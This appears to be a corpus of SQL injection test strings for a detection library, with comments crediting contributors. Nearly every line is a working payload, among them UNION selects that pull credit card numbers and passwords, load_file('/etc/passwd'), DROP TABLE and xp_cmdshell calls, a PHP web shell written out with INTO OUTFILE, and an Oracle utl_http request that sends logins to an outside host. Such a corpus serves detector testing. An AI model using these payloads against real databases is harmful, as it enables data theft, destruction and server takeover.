FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
|
||||
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
|
||||
FOO%29+AND+4499%3D8923%23
|
||||
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
|
||||
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
|
||||
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
|
||||
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
|
||||
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
|
||||
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
|
||||
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
|
||||
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
|
||||
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
|
||||
FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
|
||||
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
|
||||
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
|
||||
1+order+by+1
|
||||
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
|
||||
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
|
||||
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
|
||||
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
|
||||
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
|
||||
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
|
||||
1 - ORD('A')
|
||||
TRUE DIV(SELECT ORD(LEFT
|
||||
TRUE DIV(SELECT (ORD(LEFT
|
||||
TRUE DIV(SELECT ((ORD(LEFT
|
||||
1 DIV(SELECT ORD(LEFT
|
||||
1 DIV(SELECT (ORD(LEFT
|
||||
0 UNION SELECT (1),2,3
|
||||
1 AND (SELECT TOP 10 USERNAME FROM USERS);
|
||||
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
|
||||
1 GROUP BY 1 HAVING 1 = 1
|
||||
1 GROUP BY 1 HAVING '1' = 1
|
||||
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
|
||||
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
|
||||
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
|
||||
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
|
||||
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
|
||||
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
|
||||
'6334588?'||SLEEP(3)&&'1
|
||||
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
|
||||
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
|
||||
(1001)union select-1,ccnumber,3,4 from credit_cards
|
||||
(1001)union select (1),ccnumber,3,4 from credit_cards
|
||||
(1001)union select @a,ccnumber,3,4 from credit_cards
|
||||
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
|
||||
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001-'text' union select 1,ccnumber,3,4 from credit_cards
|
||||
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001'-@a union select 1,2,3,4 from credit_cards-- -
|
||||
'1001'-@a union select 1,2,3,4 from credit_cards
|
||||
((1001)-1) union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1)union select 1,2,3,4 from credit_cards
|
||||
## 1001 ----1 union select 1,2,3,4 from credit_cards
|
||||
1001 or 'foo' union select 1,2,3,4 from credit_cards
|
||||
1001 and @a union select 1,2,3,4 from credit_cards
|
||||
1001 like @a-1 union select 1,2,3,4 from credit_cards
|
||||
1001-\N-\N union select 1,2,3,4 from credit_cards
|
||||
(1001-\N-\N) union select 1,2,3,4 from credit_cards
|
||||
(1001-\N)-\N union select 1,2,3,4 from credit_cards
|
||||
1001-\N union select 1,2,3,4 from credit_cards
|
||||
1001-true union select 1,2,3,4 from credit_cards
|
||||
(1001-true) union select 1,2,3,4 from credit_cards
|
||||
(1001-'1') union select 1,2,3,4 from credit_cards
|
||||
(1001-@version) union select 1,2,3,4 from credit_cards
|
||||
1-(1001-true) union select 1,2,3,4 from credit_cards
|
||||
1001-false-false union select 1,2,3,4 from credit_cards
|
||||
1001-false-NULL union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
|
||||
(1)-'1' union select 1,2,3,4 from credit_cards
|
||||
(1)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-@version union select 1,2,3,4 from credit_cards
|
||||
(@version)-1 union select 1,2,3,4 from credit_cards
|
||||
(@version)-'1' union select 1,2,3,4 from credit_cards
|
||||
@version-@version union select 1,2,3,4 from credit_cards
|
||||
@version-1 union select 1,2,3,4 from credit_cards
|
||||
@version-'1' union select 1,2,3,4 from credit_cards
|
||||
('1')-'1' union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
|
||||
1001 rlike('1')union select 1,2,3,4 from credit_cards
|
||||
# vv new variations 2013-04-10 nickg vv
|
||||
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
|
||||
|
||||
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
|
||||
# a'+'b encoded is a%27%2B%27b
|
||||
a%27%2B%27b
|
||||
' OR 1='1
|
||||
|
||||
# new variations
|
||||
X' != 'Y' = 0 = '1
|
||||
X' = 'X' = 0 = '1
|
||||
X' = 'X' = 'X' = 0 = '1
|
||||
X' - 'Y' - 0 = '1
|
||||
|
||||
# part of parameter pollution
|
||||
1) FROM USERS WHERE USERNAME=
|
||||
|
||||
# nest pgsql mssql comments
|
||||
1/* /*/ */ */ or 1=1-
|
||||
1/* /* / */ */ or 1=1-
|
||||
|
||||
# small sqli
|
||||
1--
|
||||
1 --
|
||||
1 --
|
||||
1/*
|
||||
1 /*
|
||||
1 /*
|
||||
1*1--
|
||||
1 * 1--
|
||||
1 * 1 --
|
||||
1*1/*
|
||||
1 * 1/*
|
||||
1 * 1 /*
|
||||
1 * 1 /*
|
||||
@version--
|
||||
@@version--
|
||||
@version --
|
||||
@version /*
|
||||
@version/*
|
||||
|
||||
# thanks @d0znpp
|
||||
(select id from users limit 1,1)
|
||||
(select id-0 from users limit 1,1)
|
||||
# known bypass.. for now!
|
||||
(select id,id,id,id from users limit 1,1)
|
||||
|
||||
# some variations
|
||||
'1' union (select id from users limit 1,1)
|
||||
1 union (select id from users limit 1,1)
|
||||
xxx union (select id from users limit 1,1)
|
||||
@version union (select id from users limit 1,1)
|
||||
|
||||
'1' union (select 1 from users limit 1,1)
|
||||
1 union (select 1 from users limit 1,1)
|
||||
xxx union (select 1 from users limit 1,1)
|
||||
@version union (select 1 from users limit 1,1)
|
||||
|
||||
'1' union (select xxx from users limit 1,1)
|
||||
1 union (select xxx from users limit 1,1)
|
||||
xxx union (select xxx from users limit 1,1)
|
||||
@version union (select xxx from users limit 1,1)
|
||||
|
||||
'1' union (select 's' from users limit 1,1)
|
||||
1 union (select 's' from users limit 1,1)
|
||||
xxx union (select 's' from users limit 1,1)
|
||||
@version union (select 's' from users limit 1,1)
|
||||
|
||||
# thanks @LightOS
|
||||
-1 union(((select table_name from information_schema.tables limit 1,1)))
|
||||
'1' union(((select table_name from information_schema.tables limit 1,1)))
|
||||
@foo union(((select table_name from information_schema.tables limit 1,1)))
|
||||
id union(((select table_name from information_schema.tables limit 1,1)))
|
||||
|
||||
# and again @LightOS
|
||||
test'-1/1/**/union(select table)
|
||||
test'-1 union(select table)
|
||||
test'-@version union (select table)
|
||||
test'-'xyz' union (select table)
|
||||
1- @version union(select table_name from information_schema.tables limit 1,1)
|
||||
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
1- union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - @version union(select table_name from information_schema.tables limit 1,1)
|
||||
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
|
||||
@version - 5 union(select table_name from information_schema.tables limit 1,1)
|
||||
|
||||
#
|
||||
1 into outfile 'asd'
|
||||
1 into outfile 'asd'--
|
||||
'1' into outfile 'asd'
|
||||
'1' into outfile 'asd' --
|
||||
@version into outfile 'asd'
|
||||
@version into outfile 'asd' --
|
||||
|
||||
1 into outfile ('asd')
|
||||
'1' into outfile ('asd')
|
||||
@version into outfile ('asd')
|
||||
|
||||
1 into outfile substring('asd', 10, 1)
|
||||
'1' into outfile substring('asd', 10, 1)
|
||||
@version into outfile substring('asd', 10 1)
|
||||
|
||||
1 into outfile (substring('asd', 10, 1))
|
||||
'1' into outfile (substring('asd', 10, 1))
|
||||
@version into outfile (substring('asd', 10 1))
|
||||
|
||||
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
|
||||
union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
#
|
||||
# This is not valid SQL but designed to force a syntax error
|
||||
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=notthere()
|
||||
1%0Aand+current_user=1
|
||||
1%0Aand+current_user=@version
|
||||
1%0Aand+current_user='junk'
|
||||
1%0Aand+current_user=foo
|
||||
|
||||
|
||||
|
||||
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
|
||||
|
||||
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
|
||||
|
||||
case 1 when 2 then 2 end
|
||||
case sin(1) when 2 then 2 end
|
||||
case '1' when 2 then 2 end
|
||||
case 1 when 's' then 2 end
|
||||
case when 2 then 3 end
|
||||
case when 's' then 3 end
|
||||
case when f(1) then 3 end
|
||||
|
||||
-1 union select table_name asda from information_schema.tables
|
||||
-1 union select table_name "asda" from information_schema.tables
|
||||
-1 union select table_name `asda` from information_schema.tables
|
||||
-1 union select table_name as asda from information_schema.tables
|
||||
-1 union select table_name as "asda" from information_schema.tables
|
||||
-1 union select table_name as `asda` from information_schema.tables
|
||||
|
||||
a'and(select(binary(/*!system_user()*/)))like'reading%25
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
'foo' union select @``"", table_name from information_schema.tables
|
||||
@version union select @``"", table_name from information_schema.tables
|
||||
|
||||
select @version foo
|
||||
select @version "foo"
|
||||
select @version foo -- junk
|
||||
select @version "foo" -- junk
|
||||
|
||||
$$pgsql evade$$ union select * from foo
|
||||
$foo$pgsql evade$foo$ union select * from foo
|
||||
|
||||
u&'pgsql evade' union select * from foo
|
||||
U&'pgsql evade' union select * from foo
|
||||
|
||||
U&'pgsql evade' uescape '!' union select * from foo
|
||||
|
||||
_latin1'foo' union select * from foo
|
||||
_LATIN7'foo' union select * from foo
|
||||
_utf8'foo' union select * from foo
|
||||
|
||||
REAL 1 union select * from foo
|
||||
1::REAL union select * from foo
|
||||
1::REAL::REAL union select * from foo
|
||||
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
!~1 union select table_name from information_schema.tables
|
||||
-1 union select @a`from 1`, table_name from information_schema.tables
|
||||
version() union select table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
1 is unknown union select table_name from information_schema.tables
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
1 for update union select 1
|
||||
|
||||
# ht/ TK
|
||||
(true)-(true)union select table_name from information_schema.tables
|
||||
(@a)-(@a)union select table_name from information_schema.tables
|
||||
|
||||
# ht/ @stamparm
|
||||
1 OR (1 OR 1)--
|
||||
(1) OR (1 OR 1)--
|
||||
((1) OR (1 OR 1))--
|
||||
((1) OR ((1 OR 1)))--
|
||||
1 OR ((1 OR 1)) --
|
||||
1 OR ((1) OR 1) --
|
||||
|
||||
# ht/ @stamparm
|
||||
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
|
||||
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
|
||||
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
|
||||
|
||||
# ht/ @stamparm
|
||||
(SELECT 1 FROM DUAL)
|
||||
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
|
||||
(SELECT (1) FROM DUAL)
|
||||
(select @version from dual)
|
||||
(select (@version - 1) from dual)
|
||||
(select ('foo' - 1) from dual)
|
||||
(select 'foo' from dual)
|
||||
(select 1 foobar from dual)
|
||||
|
||||
# previously had problems with operators made from two words
|
||||
# ht/@stamparm
|
||||
1 and 1 not between 0 and 1
|
||||
1 AND 1 SOUNDS LIKE 1
|
||||
1 AND 1 NOT LIKE 0
|
||||
|
||||
(1 AND 1) OR 2>1--
|
||||
|
||||
# ht/@FluxReiners
|
||||
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
|
||||
'-(-1 or -1) and 1=0 union
|
||||
'-(-(1) or -1) and 1=0 union
|
||||
'-((1) or -1) and 1=0 union
|
||||
|
||||
# https://twitter.com/dsrbr/status/342132003270959104
|
||||
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
|
||||
-1 union select null, stragg(login || ':' || pass ||', ') from users;
|
||||
|
||||
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
|
||||
|
||||
#ht ivan
|
||||
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
|
||||
|
||||
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
|
||||
1'=sleep(1)='1
|
||||
|
||||
# https://twitter.com/dsrbr/status/343017094926962691
|
||||
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
|
||||
|
||||
# https://twitter.com/dsrbr/status/341228356936814592
|
||||
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
|
||||
|
||||
# https://twitter.com/dsrbr/status/340018970054766592
|
||||
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
|
||||
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
|
||||
|
||||
# http://www.exploit-db.com/exploits/25915/
|
||||
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
|
||||
|
||||
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
|
||||
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
|
||||
|
||||
# misc secondary sql statements
|
||||
1 and true; BEGIN DECLARE @xy varchar(8000)
|
||||
1; BEGIN DECLARE @xy varchar(8000)
|
||||
x' and 1 = 0; BEGIN DECLARE
|
||||
x' AND 1=0; DROP TABLE TMP_DB;
|
||||
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
|
||||
|
||||
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
|
||||
|
||||
# https://twitter.com/st1ll_di3/status/344416764949561346
|
||||
# http://pastebin.com/Ymcs7nE0
|
||||
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
|
||||
|
||||
# example from http://www.websec.ca/kb/sql_injection
|
||||
1=1 AND-+-+-+-+~~((1))
|
||||
|
||||
# the bizarre sp_password hackery
|
||||
1-- foo sp_password
|
||||
1'--sp_password
|
||||
|
||||
# nice ms-access, courtesy mod-security
|
||||
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
|
||||
|
||||
# mysql and pgsql string litterals
|
||||
b'1' UNION SELECT 1
|
||||
x'1' UNION SELECT 1
|
||||
n'1' UNION SELECT 1
|
||||
|
||||
# ending clauses
|
||||
1 having 1 limit 1 union select 1--
|
||||
1 having (1) limit 1 union select 1--
|
||||
1 having -(1) limit 1 union select 1--
|
||||
1 having sin(1) limit 1 union select 1--
|
||||
1 having 1 limit 2 group by 3 union select 1--
|
||||
1 group by 2 union select 1 --
|
||||
sin(1) group by 1 union select 1--
|
||||
@version group by 1 union select 1--
|
||||
@version group by (-1) union select 1--
|
||||
(@version) group by -1 union select 1--
|
||||
(@version) group by (-1) union select 1--
|
||||
(@version)) group by (-1) union select 1--
|
||||
(1)) group by (-1) union select 1--
|
||||
(@version) group by sin(-1) union select 1--
|
||||
1 group by sin(1) union select 1--
|
||||
1 group by 1 - sin(1) union select 1--
|
||||
1 group by (sin(1)) union select 1--
|
||||
-1 group by -(-sin(1)) union select 1--
|
||||
sin(1) group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by (-sin(1)) union select 1--
|
||||
sin(1)-1 group by 1 union select 1--
|
||||
1 group by ((1)) union select 1--
|
||||
1 group by (((1))) union select 1--
|
||||
((1)) group by (1) union select 1--
|
||||
(1) group by ((1)) union select 1--
|
||||
(1) group by (1) union select 1--
|
||||
|
||||
# more with 'having'
|
||||
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
-(1) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(true) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(null) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
|
||||
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
|
||||
|
||||
\''; DROP TABLE users; --
|
||||
\''); DROP TABLE users; --
|
||||
\''; /* one */ ;DROP TABLE users; --
|
||||
\''; select 1; drop table users; --
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
|
||||
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
|
||||
|
||||
EXEC sp_add_job @job_name = 'TestJob';
|
||||
EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;EXECUTE sp_add_job @job_name = 'TestJob';
|
||||
1;print 'foo'; exec xp_cmdshell 'destroy';
|
||||
|
||||
# nested sub-selects
|
||||
-1 - (select (1 - select (select 1))) union all select 2 --
|
||||
-1 - (select 1) - union all select 2 --
|
||||
(select 1) - 1 union all select 2 --
|
||||
((select 1) - 1) + (select 1) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select (select (select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (select ((select 1))) union all select 2 --
|
||||
(select ((select 1 - (select 1))) union all select 2 --
|
||||
(select (select (((select 1))) union all select 2 --
|
||||
(select ((select (select 1))) union all select 2 --
|
||||
(select (((select (select 1))) union all select 2 --
|
||||
(select (select (1 - select 1))) union all select 2 --
|
||||
(select (select 1 - (select 1))) union all select 2 --
|
||||
(select 1 - (select 1 - (select 1))) union all select 2 --
|
||||
|
||||
# moar unions
|
||||
-1 union distinct select table_name from information_schema.tables
|
||||
-1 union distinct all select table_name from information_schema.tables
|
||||
-1 union all distinct select table_name from information_schema.tables
|
||||
-1 union all select table_name from information_schema.tables
|
||||
|
||||
# more
|
||||
if(1, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if((1), -1, 2) union select table_name from information_schema.tables limit 1
|
||||
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
|
||||
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
|
||||
true in(2, 1) union select table_name from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
-1 union select current_user``union select table_name from information_schema.tables
|
||||
|
||||
if(1, 1, 2) union select 3
|
||||
if(sin(1), 1, 2) union select 3
|
||||
if(1, sin(1), 2) union select 3
|
||||
if(1 - sin(1), 2) union select 3
|
||||
if((1), 1, 2) union select 3
|
||||
if(-(1), 1, 2) union select 3
|
||||
|
||||
#
|
||||
1; if exists ( /* anything */
|
||||
|
||||
# these aren't SQL but close enough
|
||||
union (select 1)--
|
||||
union all (select 1)--
|
||||
union all (select distinct 1)--
|
||||
union (select 1,2,3,4,5)--
|
||||
union (select -1,2,3,4,5)--
|
||||
union (select -(1),2,3,4,5)--
|
||||
union (select -sin(1),2,3,4,5)--
|
||||
1;call p(@version, @a)
|
||||
1;load data infile "foo"
|
||||
1;load xml infile "foo"
|
||||
1;load xml local infile "foo"
|
||||
1;load xml low_priority infile "foo"
|
||||
1;load xml concurrent infile "foo"
|
||||
1; delete from foo
|
||||
1; delete low_priority from foo
|
||||
1; delete quick from foo
|
||||
1; delete ignore from foo
|
||||
|
||||
|
||||
1;do (1=1)
|
||||
|
||||
-0b01 for update union select table_name from information_schema.tables limit 1
|
||||
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
|
||||
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
|
||||
|
||||
binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - binary (false) union select table_name from information_schema.tables limit 1
|
||||
1 - (binary (false)) union select table_name from information_schema.tables limit 1
|
||||
binary binary 1 union select table_name from information_schema.tables
|
||||
binary -1 union select table_name from information_schema.tables
|
||||
binary -(1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
binary (binary 1) union select table_name from information_schema.tables
|
||||
|
||||
# werid slash escaping in Older T-SQL databases
|
||||
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
\1=\1AND\1=\1;
|
||||
|
||||
# more weird T-SQL weirdness
|
||||
\%250=\-1AND\*1=\/1
|
||||
|
||||
# mysql
|
||||
-1 procedure analyse() union select table_name from information_schema.tables limit 1
|
||||
|
||||
# HT @FluxReiners
|
||||
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
|
||||
